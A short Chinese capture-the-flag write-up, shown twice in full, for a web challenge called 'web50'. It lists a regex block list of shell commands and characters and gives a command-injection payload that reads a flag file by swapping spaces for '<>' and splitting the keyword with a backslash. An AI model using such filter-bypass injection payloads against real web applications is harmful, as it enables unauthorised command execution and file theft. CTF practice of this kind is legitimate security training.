web50
一、
过滤了;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`|\%|\x09|\x26
dev/null(空洞)
二、解题方法
/?c=tac<>fla\g.php||ls(使用<>代替空格 <>和?同时使用不回显 所以用\代替?)
web50
一、
过滤了;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`|\%|\x09|\x26
dev/null(空洞)
二、解题方法
/?c=tac<>fla\g.php||ls(使用<>代替空格 <>和?同时使用不回显 所以用\代替?)